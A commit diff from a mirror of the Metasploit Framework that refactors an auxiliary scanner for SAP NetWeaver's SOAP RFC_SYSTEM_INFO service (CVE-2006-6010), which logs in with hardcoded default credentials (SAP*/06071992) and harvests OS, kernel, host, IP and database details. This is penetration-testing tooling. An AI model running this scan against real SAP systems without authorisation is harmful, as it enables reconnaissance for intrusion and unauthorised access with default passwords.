infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

final cleanup

unstable
jvazquez-r7 2012-11-18 00:32:20 +01:00
parent e72946303e
commit a35c640acf
1 changed files with 234 additions and 73 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

307
modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
View File

@ -26,25 +26,32 @@ class Metasploit4 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'SAP SOAP RFC_SYSTEM_INFO', 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering',
'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information. 'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information.
By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker
could obtain the operating system version, SAP version, and real IP address of the server.}, could obtain the operating system version, SAP version, and real IP address of the server.},
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'References' =>
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ], [
'License' => BSD_LICENSE [ 'CVE', '2006-6010' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
],
'Author' =>
[
'Agnivesh Sathasivam',
'nmonkee'
],
'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
OptString.new('USERNAME', [false, 'username ', 'SAP*']), Opt::RPORT(8000),
OptString.new('PASSWORD', [false, 'password ', '06071992']), OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('CLIENT', [false, 'client ', '001']), OptString.new('PASSWORD', [true, 'Password', '06071992']),
], self.class) OptString.new('CLIENT', [true, 'Client ', '001']),
register_autofilter_ports([ 8000 ]) ], self.class)
end end
def run_host(ip) def run_host(ip)
success = false
client = datastore['CLIENT'] client = datastore['CLIENT']
data = '<?xml version="1.0" encoding="utf-8" ?>' data = '<?xml version="1.0" encoding="utf-8" ?>'
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
@ -76,73 +83,227 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code != 500 and res.code != 200 if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc. # to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!") print_error("[SAP] #{ip}:#{rport} - something went wrong!")
return false return
else
success = true
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("[SAP] #{ip}:#{rport} - Unable to connect") print_error("[SAP] #{ip}:#{rport} - Unable to connect")
return false return
end end
if success print_status("[SAP] #{ip}:#{rport} - got response")
print_status("[SAP] #{ip}:#{rport} - got response") saptbl = Msf::Ui::Console::Table.new(
saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default,
Msf::Ui::Console::Table::Style::Default, 'Header' => "[SAP] System Info",
'Header' => "[SAP] System Info", 'Prefix' => "\n",
'Prefix' => "\n", 'Postfix' => "\n",
'Postfix' => "\n", 'Indent' => 1,
'Indent' => 1, 'Columns' =>[
'Columns' =>[ "Info",
"Info", "Value"
"Value" ])
]) response = res.body
response = res.body rfcproto = $1 if response =~ /<RFCPROTO>(.*)<\/RFCPROTO>/i
rfcproto = $1 if response =~ /<RFCPROTO>(.*)<\/RFCPROTO>/i rfcchartyp = $1 if response =~ /<RFCCHARTYP>(.*)<\/RFCCHARTYP>/i
rfcchartyp = $1 if response =~ /<RFCCHARTYP>(.*)<\/RFCCHARTYP>/i rfcinttyp = $1 if response =~ /<RFCINTTYP>(.*)<\/RFCINTTYP>/i
rfcinttyp = $1 if response =~ /<RFCINTTYP>(.*)<\/RFCINTTYP>/i rfcflotyp = $1 if response =~ /<RFCFLOTYP>(.*)<\/RFCFLOTYP>/i
rfcflotyp = $1 if response =~ /<RFCFLOTYP>(.*)<\/RFCFLOTYP>/i rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i
rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i
rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i
rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i
rfcdatabs = $1 if response =~ /<RFCDATABS>(.*)<\/RFCDATABS>/i rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i
rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i
rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i rfcmach = $1 if response =~ /<RFCMACH>(.*)<\/RFCMACH>/i
rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i rfcopsys = $1 if response =~ /<RFCOPSYS>(.*)<\/RFCOPSYS>/i
rfcmach = $1 if response =~ /<RFCMACH>(.*)<\/RFCMACH>/i rfctzone = $1 if response =~ /<RFCTZONE>(.*)<\/RFCTZONE>/i
rfcopsys = $1 if response =~ /<RFCOPSYS>(.*)<\/RFCOPSYS>/i rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i
rfctzone = $1 if response =~ /<RFCTZONE>(.*)<\/RFCTZONE>/i rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i
rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i
rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i
rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i saptbl << [ "Release Status of SAP System", rfcsaprl ]
rfchost2 = $1 if response =~ /<RFCHOST2>(.*)<\/RFCHOST2>/i saptbl << [ "RFC Log Version", rfcproto ]
rfcsi_resv = $1 if response =~ /<RFCSI_RESV>(.*)<\/RFCSI_RESV>/i saptbl << [ "Kernel Release", rfckernrl ]
rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i saptbl << [ "Operating System", rfcopsys ]
saptbl << [ "Release Status of SAP System", rfcsaprl ] saptbl << [ "Database Host", rfcdbhost]
saptbl << [ "RFC Log Version", rfcproto ] saptbl << [ "Central Database System", rfcdbsys ]
saptbl << [ "Kernel Release", rfckernrl ] if rfcinttyp == 'LIT'
saptbl << [ "Operating System", rfcopsys ] saptbl << [ "Integer Format", "Little Endian" ]
saptbl << [ "Database Host", rfcdbhost] else
saptbl << [ "Central Database System", rfcdbsys ] saptbl << [ "Integer Format", "Big Endian" ]
if rfcinttyp == 'LIT'
saptbl << [ "Integer Format", "Little Endian" ]
else
saptbl << [ "Integer Format", "Big Endian" ]
end
saptbl << [ "Hostname", rfchost ]
if rfcflotyp == 'IE3'
saptbl << [ "Float Type Format", "IEEE" ]
else
saptbl << [ "Float Type Format", "IBM/370" ]
end
saptbl << [ "IPv4 Address", rfcipaddr ]
saptbl << [ "IPv6 Address", rfcipv6addr ]
saptbl << [ "System ID", rfcsysid ]
saptbl << [ "RFC Destination", rfcdest ]
saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ]
saptbl << [ "Character Set", rfcchartyp ]
saptbl << [ "Daylight Saving Time", rfcdayst ]
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
print(saptbl.to_s)
end end
saptbl << [ "Hostname", rfchost ]
if rfcflotyp == 'IE3'
saptbl << [ "Float Type Format", "IEEE" ]
else
saptbl << [ "Float Type Format", "IBM/370" ]
end
saptbl << [ "IPv4 Address", rfcipaddr ]
saptbl << [ "IPv6 Address", rfcipv6addr ]
saptbl << [ "System ID", rfcsysid ]
saptbl << [ "RFC Destination", rfcdest ]
saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ]
saptbl << [ "Character Set", rfcchartyp ]
saptbl << [ "Daylight Saving Time", rfcdayst ]
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
print(saptbl.to_s)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.release',
:data => "Release Status of SAP System: #{rfcsaprl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.rfc_log',
:data => "RFC Log Version: #{rfcproto}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.kernel',
:data => "Kernel Release: #{rfckernrl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'system.os',
:data => "Operating System: #{rfcopsys}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db.hostname',
:data => "Database Host: #{rfcdbhost}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db_system',
:data => "Central Database System: #{rfcdbsys}"
)
if rfcinttyp == 'LIT'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Little Endian"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Big Endian"
)
end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.hostname',
:data => "Hostname: #{rfchost}"
)
if rfcflotyp == 'IE3'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IEEE"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IBM/370"
)
end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v4',
:data => "IPv4 Address: #{rfcipaddr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v6',
:data => "IPv6 Address: #{rfcipv6addr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.instance',
:data => "System ID: #{rfcsysid}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.rfc.destination',
:data => "RFC Destination: #{rfcdest}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.timezone',
:data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.charset',
:data => "Character Set: #{rfcchartyp}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.daylight_saving_time',
:data => "Daylight Saving Time: #{rfcdayst}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.machine_id',
:data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}"
)
end end
end end